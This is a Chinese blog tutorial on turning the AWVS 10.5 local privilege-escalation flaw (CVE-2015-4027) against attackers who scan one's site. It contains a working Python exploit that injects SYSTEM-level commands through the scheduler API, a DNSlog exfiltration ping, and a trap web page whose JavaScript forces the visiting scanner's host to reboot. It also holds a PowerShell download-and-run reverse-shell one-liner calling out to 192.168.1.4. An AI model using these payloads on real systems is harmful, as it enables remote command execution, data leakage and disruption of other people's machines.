利用AWVS进行反制

最新推荐文章于 2024-09-25 17:31:40 发布
最新推荐文章于 2024-09-25 17:31:40 发布
阅读量6.2k 收藏 6
点赞数 5
分类专栏: web渗透方法论 文章标签: awvs漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/117928214
版权
本文介绍了如何利用AWVS10.5的本地权限提升漏洞(CVE-2015-4027)进行系统命令执行和权限提升。通过分析漏洞原理,展示如何构造payload模拟添加扫描任务,实现在目标系统上执行自定义命令,如DNSlog探测、系统重启等操作。此外,还探讨了利用JS代码在网页中触发命令执行的可能性,以及尝试利用PowerShell反弹shell的方法。
摘要由CSDN通过智能技术生成

目录

awvs10.5安装

命令执行

进一步利用

重启系统

反弹shell

首先,在渗透的时候,很多人会开各种扫描器收集一波信息,在国内用的最多最平常的扫描器应该是AWVS系列。这篇文章写得就是利用AWVS的一个漏洞去反制攻击者,仅提供一个思路进行参考。

这里利用的是AWVS 10被爆出一个本地权限提升漏洞(CVE-2015-4027),漏洞详情及POC:https://www.exploit-db.com/exploits/38847/

  • 实验系统:win7 sp1
  • awvs:10.5

awvs10.5安装

首先我们先下载awvs 10.5,参考:http://www.32r.com/soft/12986.html

漏洞分析

漏洞是出现在AWVS 10 的一个任务调度的API上。在AWVS 10.x 被安装后,系统会默认安装一个叫做“AcuWVSSchedulerv10”的自启动服务,这个服务是跑在system权限下的。他会监听本地的8183端口,用户可以通过它直接调用接口来给awvs添加新的扫描任务。

如下图所示,通过访问http://127.0.0.1:8183即可完成扫描任务的添加删除和进度查看。

在添加任务时,参数里有一项为reporttemplate ,他的作用是选择扫描结束生成报告时所用的模板,研究发现这个参数会被带入WVS的命令行执行。由于系统没有对用户的输入做检查,导致我们可以通过reporttemplate带入任意的参数,形成了命令注入。

通过查看awvs的官方文档:https://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/

发现wvs命令行下有一个参数为/run,通过它可以执行系统任意命令。因此我们可以使用这个参数获得一个system权限的命令执行。

这里我对原poc进行一个修改,修改为python3

#import httplib
import requests
import json
from datetime import datetime
import sys
import os
from time import gmtime, strftime
url = "http://127.0.0.1:8183/api/addScan"


if len(sys.argv) > 1:
    COMMAND = sys.argv[1] 
    pass
else:
    print('请输入想要执行的命令参数: python xx.py "command"')
    os._exit(0)
ACUHOST = '127.0.0.1'
ACUPORT = 8183
ACUHEADERS = {
    "Content-Type": "application/json; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "RequestValidated": "true"
    }
ACUEXPLOIT = "/Crawl http://www.google.it /Run \""+ COMMAND + "\"" 
ACUDATA = {"scanType":"scan",
           "targetList":"",
           "target":["http://"+"A"*2048],
           "recurse":"-1",
           "date":strftime("%m/%d/%Y", gmtime()),
           "dayOfWeek":"1",
           "dayOfMonth":"1",
           "time": "%s:%s" % (datetime.now().hour, datetime.now().minute+1),
           "deleteAfterCompletion":"False",
           "params":{"profile":"Default",
                     "loginSeq":"<none>",
                     "settings":"Default",
                     "scanningmode":"heuristic",
                     "excludedhours":"<none>",
                     "savetodatabase":"True",
                     "savelogs":"False",
                     "generatereport":"False",
                     "reportformat":"PDF",
                     "reporttemplate":"WVSDeveloperReport.rep " + ACUEXPLOIT,
                     "emailaddress":""}
           }

def sendExploit():
    """conn = httplib.HTTPConnection(ACUHOST, ACUPORT)
                conn.request("POST", "/api/addScan", json.dumps(ACUDATA), ACUHEADERS)
                resp = conn.getresponse()
                return "%s %s" % (resp.status, resp.reason)"""
    re = requests.post(url=url,headers=ACUHEADERS,data=json.dumps(ACUDATA))
    print(re.status_code,re.text)
print ("Acunetix Wvs 10 Local priviledge escalation by Daniele Linguaglossa\n")
print ("[+] Command : %s will be executed as SYSTEM" % COMMAND)
print ("[+] Sending exploit...")
sendExploit()
print ("[+] Done!")

这个payload其实就是模仿的一个添加任务的一个请求,这里可以使用proxychains对poc进行流量的截取查看

命令执行

我们把这个poc进行执行

1. DNSlog探测

首先在dnslog平台获取一个子域,http://www.dnslog.cn/

执行python脚本,我们发现此时立即添加了一个扫描任务,任务是在一分钟后执行

一分钟后刷新dnslog,发现命令被执行了 

2.dnslog回显系统信息

dnslog结合Windows系统变量回显系统信息

python 1.py "ping %USERNAME%.8mszqz.dnslog.cn"

 

进一步利用

然后思考,可不可以在网页中写入js代码,然后js中放入我们的poc,将poc用js的方式进行提交。这里将原作者的js代码进行一个修改,因为我用其提供的js代码并不能执行成功,修改的js代码如下。写先一个简单的HTML页面

重启系统

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>钓鱼网站</title>
    <h1>嗨喽,欢迎来到到我的世界</h1>
</head>
<body>
    <script> 
		var time = new Date()
		var y = time.getFullYear();
		var m = time.getMonth()+1;
		var d = time.getDate();
		var hours = time.getHours();
		var min = time.getMinutes()+1;
		//var command = "shutdown -r -t 0";
		var padding = "http://";
		for(i=0;i<2048;i++)padding+="a";
		var exp = '{"scanType":"scan","targetList":"","target":["'+padding+'"],"recurse":"-1","date":"'+m+'/'+d+'/'+y+'","dayOfWeek":"1","dayOfMonth":"1","time":"'+hours+':'+min+'","deleteAfterCompletion":"False","params":{"profile":"Default","loginSeq":"<none>","settings":"Default","scanningmode":"heuristic","excludedhours":"<none>","savetodatabase":"True","savelogs":"False","generatereport":"False","reportformat":"PDF","reporttemplate":"WVSDeveloperReport.rep /Crawl http://www.google.it /Run \\"shutdown /r /t 0 \\"","emailaddress":""}}'
		document.write(exp)
		var xmlhttp;
		if(window.XMLHttpRequest){
		  xmlhttp = new XMLHttpRequest();
		  }else{
		  xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
		  }
		  xmlhttp.open("POST","http://127.0.0.1:8183/api/addScan",true);
		  xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
		  xmlhttp.setRequestHeader("RequestValidated","true");
		  xmlhttp.send(exp);

	</script>
</body>
</html>

用pyhthon起一个web服务

python -m http.server 80

shutdown /r /t 0,就是我们执行的系统命令

然后,当我们使用扫描器对网站进行扫描的时候,一扫描发现,系统自动添加了一个扫描任务

当任务执行的时候,攻击者的系统重启了~~

当然还可以进行添加账号等一些操作。

反弹shell

ps的执行策略

默认不允许运行ps脚本

四种策略

  • Restricted 默认,不允许执行脚本(管理员也不行)
  • ALLsigned 允许云心经过证书验证的脚本
  • Unrestricted 允许执行任意脚本
  • RemoteSigned 本地脚本不限制,来自网络的脚本需要经过签名
Get-Executionpolicy              看脚本运行策略 
Set-Executionpolicy Unrestricted  更改脚本策略为Unrestricted

因为是winndows下,所以并不好反弹shell,这里想的是利用powershell脚本进行反弹

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd

但是放到poc里面去,并不会执行这个命令,不知道啥原因~~

Ly4j
关注
专栏目录
安全红蓝对抗反制(反捕、画像)
墨痕诉清风的博客
03-09 3700
1.蜜罐 蜜罐可以理解成互联网上的一台主机,它的作用是诱骗攻击者去对自己进行攻击,然后记录攻击者的攻击细节并生成对应的攻击者画像,是当前的一种比较主流的入侵检测系统也是一种主动防御系统。 1.1 放置高交互蜜罐 放置高交互蜜罐,例如一个邮箱服务类型的蜜罐,攻击者有可能会进行邮箱注册,这样子攻击者就主动向我们留下了自己的身份信息。 1.2 放置多个容易被发现的蜜罐 放置多个攻击者可以轻而易举发现的蜜罐,攻击者就会知道自己所在的环境是被蜜罐所包围的,有可能就会放弃进行大范围攻击,变相保护了蜜罐背后的真
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[原创]K8飞刀 新增Acunetix WVS 远程漏洞 反制黑客
weixin_30486037的博客
01-12 331
工具: K8飞刀20150603组织:K8搞基大队[K8team]作者:K8拉登哥哥博客:http://qqhack8.blog.163.com发布:2015/6/320:41:29简介: K8飞刀是一款多功能的渗透测试工具。Hacker Swiss Army Knife. 图片: 可以构造指定网站 识别指定特征 精确打击 专搞黑阔K8_WVS漏洞扫描工具远程代...
溯源反制-漏洞扫描工具-Goby&Awvs
m0_62172162的博客
04-25 397
溯源反制-漏洞扫描工具-Goby&Awvs
awvs测试pikachu站点漏洞报告教程
最新发布
m0_73771249的博客
09-25 616
2、安装完成将破解文件放入C:\ProgramDatalAcunetix\shared\llicense,替换,然后打开即可。3、添加ip进行扫描。5、导出漏洞报告查看。
SlowHTTPTest 慢***测试
无锋剑
01-19 298
   SlowHTTPTest是一个可配置的工具,模拟了一些应用程序层拒绝服务***。它可以在大多数Linux平台,OSX和Cygwin——一个类unix环境和命令行接口为窗口。        Slowloris和缓慢的HTTP POST DoS***依赖于HTTP协议的事实,通过设计,将每次发送数据包的一部分。如果一个HTTP请求是不完整的,或者如果转移率非常低,服务器保持其资源忙等待其余的...
【应急响应】战中溯源反制&对抗上线CS&Goby&蚁剑&Sqlmap等安全工具
今天是几号的博客
04-20 1975
CS反制 Goby反制 Antsword反制 AWVS反制 BURP反制 SQLMAP反制 XSS钓鱼 蜜罐反制。前面准备工作都是一气呵成,这里有个一很坑的地方就是使用pip安装Frida module时,一开始安装总是报错(tiemout以及各种问题),然后我不停的换Pytthon版本emmm,最后解决是使用超级管理员权限运行cmd就好了(心中无数个?) ```bash python cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.sv
GNU 黑客开发端口扫描反制工具
weixin_34221775的博客
06-02 217
德国知名IT媒体Heise上周报道了英国情报机构GCHQ的大规模监视系统HACIENDA,HACIENDA系统使用端口扫描工具扫描了27个国家的所有联网服务器,寻找存在漏洞的系统。为了避开端口扫描保护不公开的服务器,几位GNU开发者在德国举行的GNU黑客会议上透露了他们开发的规避工具TCP Stealth系统及其自由软件实现Knock。TCP Steal...
红队系列-溯源与应急反制专题
aming小老弟
11-09 530
日志分析、流量特征分析、内存马。
【愚公系列】2023年06月 网络安全高级班 025.HW护网行动攻防演练介绍和工具
时光隧道
05-12 9764
HW护网行动攻防演练是一种针对网络安全的实践活动,用于测试和提高组织的网络安全防御和攻击能力。通过模拟真实的网络攻击和防御行动,演练参与者在紧张压力下的反应和解决问题的能力,发现网络安全漏洞和提高安全意识,加强网络安全防御能力。攻防演练的成员组成一般包括攻击者、防御者和观察者三个角色。攻击者的任务是模拟真实的黑客攻击,找出系统的漏洞利用进行攻击,以检验系统的安全性。防御者则负责发现和修补漏洞,并保护系统不受攻击。观察者则负责记录和分析整个攻防过程,并提供建议和改进意见。
网络安全工程师面试题整理
m0_67393686的博客
07-30 7417
网络发现和安全审计工具主机发现端口扫描应用程序和版本探测操作系统探测-p指定端口扫描-sTtcp扫描-sPping扫描-Pn不进行ping扫描-o操作系统探测。
AWVS扫描调度模块
loveqqcc的博客
10-20 178
扫描授权模块 meta 数据结构中存放的是基本的授权用户信息, email 和 password def auth(self, meta): import urllib2 import ssl import json ssl._create_default_https_context = ssl._create_unverified_context url_login="https://localhost:3443/api/v1/me/login"
蓝队的自我修养之事中监控
m0_61869253的博客
07-29 813
作为一名蓝方值守人员,依托安全设备,基于自己的安全经验,从海量的日志中尽可能的发现更多威胁,帮助攻防演练中甲方找到自己的短板,在第一时间进行安全修复。本文介绍了笔者在一线使用安全设备的思路,只是抛砖引玉,相信还有更多的技巧方法。关于对捕获到攻击者IP 进行“事后溯源”,我们下篇见。er-Agent 判断哪些是脚本利用,但是这种搜索结果不是很准确,因为互联网上僵尸网络也会利用自定义脚本攻击业务系统。
Day101:漏洞发现-漏扫项目篇&Nuclei&Yakit&Goby&Afrog&Xray&Awvs&联动中转被动
qq_61553520的博客
04-14 1407
小迪安全-Day101:漏洞发现-漏扫项目篇&Nuclei&Yakit&Goby&Afrog&Xray&Awvs&联动中转被动
AWVS详细教程
Kali与编程
03-24 4972
AWVS是一种功能强大的Web应用程序安全扫描器,帮助用户发现可能的安全漏洞并提供修复建议。我们还介绍了一些常用命令,帮助您更好地使用AWVS。然后,您可以在Web浏览器中访问 http://localhost:3443/ 地址来登录AWVS Web界面。您可以从Acunetix官方网站下载适用于您的操作系统的AWVS安装程序。在安装AWVS后,您需要启动AWVS服务并登录Web界面。扫描完成后,您可以查看扫描结果并分析漏洞。在成功登录后,您需要创建一个新的扫描任务。AWVS也支持命令行扫描。
Log4j2 漏洞检测工具清单
热门推荐
01-17 1万+
距离Log4j2漏洞公开已经过去一个月了,它所造成的严重影响已经不需要我们重复提及了。随着时间的推移,新的漏洞会不断出现,旧的漏洞会不断消失,而这个Log4j2中的RCE漏洞可能需要好几年...
avws扫描出来的漏洞怎么利用_如何优雅的反击扫描你网站的黑客[AWVS]
weixin_40007804的博客
12-22 3161
今天我们的威胁情报系统显示知名的web漏洞扫描器AWVS 10被爆出一个本地权限提升漏洞漏洞详情及POC:漏洞分析根据作者的描述,问题是出现在AWVS 10 的一个任务调度的API上。在AWVS 10 被安装后,系统会默认安装一个叫做“AcuWVSSchedulerv10”的自启动服务,这个服务是跑在system权限下的。他会监听本地的8183端口,用户可以通过它直接调用接口来给awvs添加新的...
AWVS14.7文件上传漏洞检测逻辑分析
Ciyaso的博客
07-08 1606
AWVS14.7文件上传漏洞检测逻辑分析
nessus awvs
06-28
Nessus和AWVS都是知名的企业级网络安全扫描工具,它们分别属于Tenable Network Security公司。让我们逐一了解一下: 1. Nessus:Nessus是一款强大的漏洞扫描器,它可以帮助安全专业人员发现网络中的弱点,包括操作系统漏洞、应用程序漏洞、网络配置错误等。用户可以通过 Nessus 进行主动或被动扫描,生成详细的报告,并对发现的问题提供修复建议。 2. AWVS (Advanced Web Vulnerability Scanner):这是Nessus的一部分,专用于Web应用程序的安全评估。AWVS可以模拟攻击者的行为,测试Web应用是否存在常见的安全漏洞,如SQL注入、跨站脚本(XSS)、CSRF等。它支持多种协议(HTTP/HTTPS)和多种认证方法,便于评估Web应用的安全状况。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ly4j

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值